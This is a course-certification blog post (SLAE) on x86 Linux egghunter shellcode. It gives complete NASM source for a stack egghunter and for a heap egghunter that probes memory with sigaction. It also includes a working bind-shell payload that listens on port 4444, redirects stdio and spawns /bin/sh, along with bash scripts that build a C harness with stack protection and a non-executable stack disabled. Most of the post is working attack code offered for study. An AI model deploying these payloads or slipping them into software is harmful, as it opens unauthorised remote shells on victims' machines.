This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:
Student ID: SLAE-644
GitHub resource containing challenge files:
Local link to source files:
Source used:
Memory layout
Egghunter using stack:
First things first. Anatomy of the memory can be seen in the following picture:
An egghunter works the same way as in real life. Someone hides an egg and someone goes and look for it until he finds it.
There are two implementations below:
1. Egghunter in stack:
You can look at it like a two stager execution model. We put an egg in the beginning of our shellcode on the stack, and it will be called "bali" (stage 2). We will put it there twice. Why? Because when we read the memory, the search function will have the string in memory once, and it will find itself. To ignore this case, we can put the egg twice after each other. which makes it unique in memory. We will build a search tool (stage 1) which reads in one direction, that will look for the shellcode, and will execute the shellcode after the "egg". Bottleneck is that you can only search in one memory segment, or in multiple segments without gaps in between.
2. Egghunter in heap:
Same logic, except that the egg will be in the heap. The funny thing about heap is, that we will have no clue about the exact memory address, and we start the search sequentially in the .text segment, which comes first. Then we will read the memory and will end up getting SIGSEGV errors. This is not a real error, but means that the memory doesn't contain any useful commands, so leave him alone:). We will need to do some SIGSEGV error checks to be able to search the entire heap.
Stack based egghunter
I'll start reading the memory from where the program is, to start with a valid address in the memory as a starting point for the search (EAX). There is a "next" label which is a label to increase memory address for the next read. "isegg" label is a procedure to read the memory and act upon the results of the read. I hate doing error checks, so I am just reading the memory "back"/"forward" (very relative, but if we look at the logical context, we read back:)) to find the egg. My egg is "bali"="0x696c6162" which is reverse because of little-endian. Good. So we focus on the memory that is 8 byte before the shellcode, and match it to the eggcode. If fails, we increase the memory address, and read the next address. If matches, we go and compare the memory that is 4 bytes before the shellcode, and check if it matches the egg. If not, increase memory and do the checks again with the new address. If matches, we found the egghunter code, we need to execute the shellcode: JMP EAX
Assembly code:
global _start section .text _start: pop eax ;save value of EAX _next: inc eax ;read the next value from memory _isegg: cmp dword [eax-0x8],0x696c6162 ;start of egg jne _next ;if no match, go and increase eax to point to the next address in memory cmp dword [eax-0x4],0x696c6162 ;second match for the egg - positive match jne _next ;if second match fails, go to the next memory address jmp eax ; execute the shellcode </p>
The actual shellcode is from: SLAE32 Challenge #1 Linux Bind Shell in Assembly
The only modification to it is the text: db "balibali". This is our egg.
Bind shell script with the egg in it:
global _start section .text db "balibali" _start: ;sockfd= socket(AF_INET, SOCK_STREAM, 0) xor eax,eax ;clean eax mov al,0x66 ;set syscall number to socket xor ebx,ebx ;zero out ebx push ebx ;stack protocol=0, default (could be 6 for TCP) inc ebx ;prepare ebx=1 for stack push ebx ;stack type=1, sock_stream push byte 0x2 ;stack domain, af_inet mov ecx,esp ;store a pointer to the parameters for dup2 int 0x80 ;call the syscall, it returns the socket file descriptor to EAX mov esi, eax ;store sockfd into ESI ;bind(int sockfd, const struct sockaddr *addr, socklen_t addrlen) mov al,0x66 ;set syscall number to socket pop ebx ;take the 2 from the stack to use as bind ;pop esi ; remove the 0x1 from stack and leave 0x0 ;prepare struct xor edx,edx ;zero out edx push edx ;set the sin_addr=0 (INADDR_ANY) push word 0x5C11 ;set sin_port=4444 push word bx ;sin_family AF_INET =0x2 mov ecx, esp ;save pointer ;prepare struct end push 0x10 ;addrlen=16 structure length push ecx ; struck sockaddr pointer push esi ; this is a pointer to the file descriptor sockfd mov ecx, esp ;pointer to bind() args int 0x80 ; exec sys bind ;listen mov al,0x66 ;syscall 102 mov bl, 0x4 ;sys_listen push ebx ;backlog=0x0 push esi ;sockfd mov ecx,esp ;save pointer to args int 0x80 ;call syscall ;accept mov al,0x66 ;syscall 102 mov bl, 0x5 ;sys_accept push edx ; addrlen=0x0 push edx ; struct=0x0 push esi ;socketd mov ecx, esp ;save pointer to args int 0x80 ;call syscall ;redirect xchg ebx, eax ;store the socketfd in ebx, and 0x5 in eax. EBX will be the oldfd in DUP2 pop ecx ; pull the 0x00000000 from the stack mov cl, 0x2 ; set counter to 2, this will be newfd in DUP2 ;loop to call dup2 3 times and duplicate file descriptor for STDIN, STDOUT and STDERR myloop: mov al,0x3F ;dup2 syscall int 0x80 ;syscall dup2 dec ecx ; decrement counter jns myloop ; jmp to loop as long as SF is not set to 1 ;execve xor eax,eax push eax ;push the ending 0x0 push 0x68732f2f ; "hs//" the trick is "//"="/" tom make it four bytes push 0x6e69622f ; "nib/" mov ebx, esp ;save the pointer to filename push eax ; set argument t 0x0 mov ecx, esp ;save the pointer to argument envp push eax ; set argument t 0x0 mov edx, esp ;save the pointer to argument ptr mov al,0xb ;call execve int 0x80 ; execute syscall </p>
I have developed the compiler script, which can change the egghunter code and compile the whole thing. Be careful, NULL characters in the egg brakes the whole fun. Actually it terminates the program.
Compile script:
#!/bin/bash echo '####################################################################' echo 'Usage: ./ <egghunter> <shellcode> <egg>' echo 'Example (without extensions!): ./ egghunter shellcode woof' echo '####################################################################' echo '[+] Changing egg to '$3' ...' >eggcode.txt for i in `echo -n $3|rev|tr -d '\n'|xxd -g 1 -c 1|cut -d " " -f2|grep -Eo '^[0-9a-f]{2}$'` ; do echo -n "$i" >>eggcode.txt ; done echo '[+] New eggcode in hex little-endian:' myegg=`cat eggcode.txt` echo $myegg cp $1.nasm $1.nasm_orig sed s/0x696c6162/0x$myegg/g < $1.nasm_orig > $1.nasm echo '[+] Assembling '$1' Egghunter with Nasm ... ' nasm -f elf32 -o $1.o $1.nasm echo '[+] Linking ...' ld -o $1 $1.o echo '[+] Objdump ...' >egghunter.txt for i in `objdump -d $1|tr '\t' ' '|tr ' ' '\n'|grep -Eo '^[0-9a-f]{2}$'` ; do echo -n "\x$i" >>egghunter.txt ; done myegghunter=`cat egghunter.txt` echo $myegghunter ########################################################################### #changing egg plaintext cp $2.nasm $2.nasm_orig sed s/balibali/$3$3/g < $2.nasm_orig > $2.nasm echo '[+] Assembling '$2' payload shellcode with Nasm ... ' nasm -f elf32 -o $2.o $2.nasm echo '[+] Linking ...' ld -o $2 $2.o echo '[+] Objdump ...' >shellcode.txt for i in `objdump -d $2|tr '\t' ' '|tr ' ' '\n'|grep -Eo '^[0-9a-f]{2}$'` ; do echo -n "\x$i" >>shellcode.txt ; done myshellcode=`cat shellcode.txt` echo $myshellcode echo '[+] Assemble shellcode C ...' echo "#include<stdio.h>" >shellcode.c echo "#include<string.h>" >>shellcode.c echo "unsigned char egghuntercode[] = \"\\" >>shellcode.c echo $myegghunter"\";" >>shellcode.c echo "unsigned char shellcode[] = \"\\" >>shellcode.c echo $myshellcode"\";" >>shellcode.c echo "main()" >>shellcode.c echo "{" >>shellcode.c echo "printf(\"Egghuntercode Length: %d\n\", strlen(egghuntercode));" >>shellcode.c echo "printf(\"Shellcode Length : %d\n\", strlen(shellcode));" >>shellcode.c echo " int (*ret)() = (int(*)())egghuntercode;" >>shellcode.c echo " ret();" >>shellcode.c echo "}" >>shellcode.c echo '[+] Compile shellcode.c' gcc -fno-stack-protector -z execstack shellcode.c -o shellcode echo '[+] Done!' </p>
Egghunter using heap:
So this is more challanging. Why? Because we will need to do some memory read error verification in assembly. I'm not going to reinvent the wheel, but use others brain. I found that using sigaction is a good solution:
Function prototype:
int sigaction(int signum, const struct sigaction *act, struct sigaction *oldact);
Purpose: Used to change an action by a process on receiving a specific signal. Can handle any valid signal except for SIGKILL/SIGSTOP
Sigaction structure definition as per prototype:
struct sigaction {
void (*sa_handler)(int);
void (*sa_sigaction)(int, siginfo_t *, void *);
sigset_t sa_mask;
int sa_flags;
void (*sa_restorer)(void);
I have used the "scasd" function as suggested in the referenced paper to compare the egg to the memory address contents. In order to start with a clean sheet, I executed a "cld" to clear the carry flag. Not doing this could make the scasd fail.
By initializing edi to the pointer value that is currently in ecx, the scasd instruction can be used to compare the contents of the memory stored in edi to the dword value that is currently in ecx. This allows for a comparison and has an added side effect of incrementing edi by four after each comparison
The code will read the memory segments based on the segment size in the given OS (can be retrieved using "getconf PAGE_SIZE", in our case 4096). Unfortunately 4096 in hex would require us to pul nulls in our code, which would terminate the code. So I used atrick, and put 4095 and increased by 1.
Tho following code is commented below, it basically reads the memory by four bytes and compare them to egg. If matches twice in a row, the code at EDI will be executed.
Assembly code:
global _start section .text _start: cld ;clear carry flag to make sure that scasd is working xor edx,edx ;clear edx xor ecx,ecx ;clear ecx next_page: or cx,0xfff ;add 4095 - this is from the output of command "getconf PAGE_SIZE"=4096 ;to avoid zeroes in shellcode, we put 4095 and increase it by 1 next_addr: inc ecx ;PAGE_SIZE=4096 ;; lea ebx, [ecx] ;[ecx+0x4] proper alignment, avoiding SIGSEGV in first scasd push 0x43 ;sigaction() syscall pop eax; int 0x80 ; make the syscall cmp al, 0xf2 ;test for fault EFAULT je next_page mov eax, 0x696c6162 ; egg code to find mov edi,ecx ;edi contains the address to look for scasd ;look for the egg, increase edi with +4 if match jnz next_addr ;no marker found, jump to next address scasd ;look for the egg, increase edi with +4 if match jnz next_addr ;no marker found, jump to next address jmp edi ;found egg, jump to shellcode </p>
Compile script:
#!/bin/bash echo '####################################################################' echo 'Usage: ./ <egghunter> <shellcode> <egg>' echo 'Example (without extensions!): ./ egghunter shellcode woof' echo '####################################################################' echo '[+] Changing egg to '$3' ...' >eggcode.txt for i in `echo -n $3|rev|tr -d '\n'|xxd -g 1 -c 1|cut -d " " -f2|grep -Eo '^[0-9a-f]{2}$'` ; do echo -n "$i" >>eggcode.txt ; done echo '[+] New eggcode in hex little-endian:' myegg=`cat eggcode.txt` echo $myegg cp $1.nasm $1.nasm_orig sed s/0x696c6162/0x$myegg/g < $1.nasm_orig > $1.nasm echo '[+] Assembling '$1' Egghunter with Nasm ... ' nasm -f elf32 -o $1.o $1.nasm echo '[+] Linking ...' ld -o $1 $1.o echo '[+] Objdump ...' >egghunter.txt for i in `objdump -d $1|tr '\t' ' '|tr ' ' '\n'|grep -Eo '^[0-9a-f]{2}$'` ; do echo -n "\x$i" >>egghunter.txt ; done myegghunter=`cat egghunter.txt` echo $myegghunter ########################################################################### #changing egg plaintext cp $2.nasm $2.nasm_orig sed s/balibali/$3$3/g < $2.nasm_orig > $2.nasm echo '[+] Assembling '$2' payload shellcode with Nasm ... ' nasm -f elf32 -o $2.o $2.nasm echo '[+] Linking ...' ld -o $2 $2.o echo '[+] Objdump ...' >shellcode.txt for i in `objdump -d $2|tr '\t' ' '|tr ' ' '\n'|grep -Eo '^[0-9a-f]{2}$'` ; do echo -n "\x$i" >>shellcode.txt ; done myshellcode=`cat shellcode.txt` echo $myshellcode echo '[+] Assemble shellcode C ...' #myshellcode="AABBCCDDEEFFABCD" echo "#include<stdio.h>" >shellcode.c echo "#include<string.h>" >>shellcode.c #echo "#include<stdio.h>" >>shellcode.c echo "unsigned char egg[] = \"$3\";" >>shellcode.c echo "unsigned char egghuntercode[] = \"\\" >>shellcode.c echo $myegghunter"\";" >>shellcode.c echo "unsigned char shellcode[] = \"\\" >>shellcode.c echo $myshellcode"\";" >>shellcode.c echo "main()" >>shellcode.c echo "{" >>shellcode.c echo "printf(\"Egghuntercode Length: %d\n\", strlen(egghuntercode));" >>shellcode.c echo "printf(\"Shellcode Length : %d\n\", strlen(shellcode));" >>shellcode.c echo "char *heap;" >> shellcode.c echo "heap=malloc(400);" >> shellcode.c echo "printf(\"Memory address of shellcode: %p\n\",heap);" >> shellcode.c echo "memcpy(heap+0,egg,4);" >> shellcode.c echo "memcpy(heap+4,egg,4);" >> shellcode.c echo "memcpy(heap+8,shellcode, sizeof(shellcode)-1);" >> shellcode.c echo " int (*ret)() = (int(*)())egghuntercode;" >>shellcode.c echo " ret();" >>shellcode.c echo "}" >>shellcode.c echo '[+] Compile shellcode.c' gcc -fno-stack-protector -z execstack shellcode.c -o shellcode echo '[+] Done!' </p>